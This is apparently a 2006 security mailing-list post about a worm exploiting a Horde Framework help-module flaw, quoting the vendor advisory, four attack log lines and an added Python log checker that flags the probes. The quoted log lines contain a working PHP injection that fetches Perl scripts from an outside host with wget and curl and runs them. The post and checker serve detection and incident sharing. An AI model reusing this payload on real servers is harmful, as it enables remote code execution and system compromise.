Is anyone noticing a new horde worm out there? It is related to the following vulnerability (http://www.horde.org):
"March 28th, 2006. The Horde Team has released a critical security fix for the Horde Application Framework versions 3.0 and above. Version 2.x and earlier releases are not affected. The fixed Horde versions 3.0.10 and 3.1.1 are available. We strongly encourage every user to update to the new versions immediately. There are exploits in the wild for this vulnerability. They can only exploit the user the webserver runs as, but are still serious. Please upgrade now."

I'm getting alerts from ossec for the following logs (yes, my horde is updated :)). Is anyone seeing that?

217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"

204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"

204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"

69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"

Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net
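An added example, not part of the original message and not OSSEC's own rule logic: a small access-log check that flags requests to the Horde help viewer whose `module` parameter is not a bare name, which is the shape of the probes quoted above. It assumes legitimate `module` values contain only letters, digits, `_` and `-`; the sample lines are constructed, with documentation IP addresses and a shortened payload.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined log format, matching the layout of the lines in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"'
)
# Assumption: a legitimate module value is a bare application name.
SAFE_MODULE = re.compile(r'^[A-Za-z0-9_-]*$')

def check_line(line):
    """Return a dict describing a suspicious help-viewer request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    if '/services/help/' not in parts.path:
        return None
    # Split on '&' only: the payload itself contains ';', which some
    # query-string parsers treat as a separator.
    for pair in parts.query.split('&'):
        key, _, raw = pair.partition('=')
        if key == 'module' and not SAFE_MODULE.match(unquote(raw)):
            # Status is reported, not used as a verdict: the post shows 200
            # responses from a server its author says is already updated.
            return {'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                    'agent': m['agent'], 'module': unquote(raw)}
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample lines (documentation IP ranges, shortened payload).
SAMPLE = [
    '192.0.2.10 - - [20/Jun/2006:13:41:22 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp%22); HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"',
    '198.51.100.7 - - [20/Jun/2006:13:42:00 -0300] "GET /horde/services/help/?show=about&module=horde HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Jun/2006:13:43:10 -0300] "GET /horde/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit)
```
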
